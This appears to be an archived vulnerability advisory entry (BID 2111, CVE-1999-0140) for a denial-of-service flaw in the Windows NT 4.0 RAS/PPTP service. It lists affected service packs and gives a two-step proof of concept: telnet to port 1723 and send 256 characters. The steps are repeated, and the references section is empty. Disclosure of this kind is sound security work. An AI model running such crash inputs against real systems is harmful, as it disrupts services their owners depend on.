Microsoft NT RAS/PPTP Malformed Control Packet Denial of Service Attack
BID:2111
Info
Microsoft NT RAS/PPTP Malformed Control Packet Denial of Service Attack
| Bugtraq ID: | 2111 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-1999-0140 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Apr 27 1999 12:00AM |
| Updated: | Jul 11 2009 04:46AM |
| Credit: | Posted to BugTraq on April 27, 1999 by Simon Helson <[email protected]> |
| Vulnerable: |
Microsoft Windows NT Terminal Server 4.0 Microsoft Windows NT 4.0 SP4 Microsoft Windows NT 4.0 SP3 Microsoft Windows NT 4.0 SP2 Microsoft Windows NT 4.0 SP1 Microsoft Windows NT 4.0 |
| Not Vulnerable: |
Microsoft Windows NT 4.0 SP6 Microsoft Windows NT 4.0 SP5 |
Exploit / POC
Microsoft NT RAS/PPTP Malformed Control Packet Denial of Service Attack
1) telnet targetmachine 1723
2) hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhh (256 characters)
3) ctrl-d
1) telnet targetmachine 1723
2) hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhh (256 characters)
3) ctrl-d
References
Microsoft NT RAS/PPTP Malformed Control Packet Denial of Service Attack
References:
References: